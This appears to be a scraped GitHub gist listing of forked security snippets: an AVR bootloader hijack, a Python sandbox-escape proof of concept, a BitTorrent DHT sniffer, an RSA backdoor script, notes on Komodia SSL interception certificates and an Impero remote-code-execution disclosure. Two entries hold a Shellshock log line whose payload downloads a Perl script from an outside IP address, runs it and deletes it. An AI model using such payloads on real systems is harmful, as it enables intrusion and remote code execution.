Skip to content

Instantly share code, notes, and snippets.

View hotelzululima's full-sized avatar

hotelzululima hotelzululima

57 followers · 146 following
View GitHub Profile
@hotelzululima
hotelzululima / BootJacker.c
Created July 14, 2014 19:26 — forked from Snial/BootJacker.c
#define SPIFbit 7
#define SPR (1<<0)
#define kSpmCsr 0x37
#define kSpmCsrMem (kSpmCsr+0x20)
#define IOAddrInsMask(aPort) (((aPort&0x30)<<5)|(aPort&7))
#define kBootloaderStart 0x7800
#define kMicroBootStart 0x7f80
#define kBootloaderEnd 0x8000
@hotelzululima
hotelzululima / poc.py
Last active August 29, 2015 14:06 — forked from pbiernat/poc.py
'''
A simple demonstration of obtaining, modifying and executing code objects in python without relying
on commonly blocked keywords such as exec, compile, etc...
-Patrick Biernat.
'''
import __builtin__
mydict = {}
@hotelzululima
hotelzululima / jur
Last active August 29, 2015 14:06
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22
@hotelzululima
hotelzululima / jur
Last active August 29, 2015 14:07
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22
@hotelzululima
hotelzululima / dht_sniff.py
Last active August 29, 2015 14:07 — forked from chokepoint/dht_sniff.py
#!/usr/bin/env python
"""
Sniff a specific port for Bit Torrent DHT traffic and print
requests/responses in human readable form.
Reference: http://www.bittorrent.org/beps/bep_0005.html
"""
from pcapy import open_live
from bencode import bdecode
@hotelzululima
hotelzululima / dht_sniff.py
Last active August 29, 2015 14:07 — forked from chokepoint/dht_sniff.py
#!/usr/bin/env python
"""
Sniff a specific port for Bit Torrent DHT traffic and print
requests/responses in human readable form.
Reference: http://www.bittorrent.org/beps/bep_0005.html
"""
from pcapy import open_live
from bencode import bdecode
@hotelzululima
hotelzululima / rsabd.py
Last active August 29, 2015 14:14 — forked from ryancdotorg/rsabd.py
#!/usr/bin/env python
import sys
import gmpy
import curve25519
from struct import pack
from hashlib import sha256
from binascii import hexlify, unhexlify
@hotelzululima
hotelzululima / rsabd.py
Last active August 29, 2015 14:14 — forked from ryancdotorg/rsabd.py
#!/usr/bin/env python
import sys
import gmpy
import curve25519
from struct import pack
from hashlib import sha256
from binascii import hexlify, unhexlify
@hotelzululima
hotelzululima / gist:3b04c78f05c539eed739
Last active August 29, 2015 14:25 — forked from Wack0/gist:17c56b77a90073be81d3
Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.
Superfish isn't the only product to use that sdk. there's others too.
Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
key pair. Seems a lot of people think they all use the superfish cert. That is
NOT the case.
First thing I checked was komodia's own parental control software,
Keep My Family Secure. (mentioned on komodia's own website).
@hotelzululima
hotelzululima / impero-rce
Last active August 29, 2015 14:25
If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/
They recently were in the news about how they implemented "anti-radicalisation" shit or something.
They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me.
Some reversing later, looks like Impero is completely pwned amirite.
The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used.